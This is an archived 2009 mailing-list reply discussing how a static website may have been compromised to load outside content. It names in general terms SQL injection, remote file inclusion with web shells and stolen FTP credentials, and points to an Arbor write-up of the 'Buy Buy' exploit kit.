On Mon, Apr 20, 2009 at 12:47 PM, Neil <kngspook@gmail.com> wrote:
I've run into this sort of attack before, where they change the page to load content from elsewhere; but I couldn't figure out how they managed to write to the sites' pages. They were hosted on a commercial webhost, and so if it was a compromised host (which seemed like the only possibility to me), that didn't speak well for the hosting company.
SQLi is prolly the most common way to inject code. Shared databases can lead to shared security problems. It's also possible that the hosting provider could be having other security issues that would allow an attack to directly edit the website in question. Remote file inclusions are also a popular way to modify web page. Include a web shell, and then run a few commands to insert the malicious code into the website.
We were having issues with the company anyways, though; so I took down the site, sanitized the pages (and removed a bunch of junk), and put the site back up with another company.
But if you figure out how they got write access to a static website, I'd love to hear it.
Compromised FTP credentials would be my guess. They can be obtained by brute force attacks or credential stealing trojans. The obfuscation used by this exploit kit looked kinda familiar, but I wasn't able to match it to any exploit kits I know of. But it looks like the guys at Arbor examined this at the beginning of the year: http://asert.arbornetworks.com/2009/01/buy-buy-exploitation/ They're referring to it as Buy Buy due to the buybuy.html page. Also looks like a commenter at the article mentions that he had a problem with this that was caused by compromised ftp accounts. Of course, given how often exploit kits are copied, modified, merged, etc, etc. The buy buy kit could just be a relative of the this one. Regards, -Nick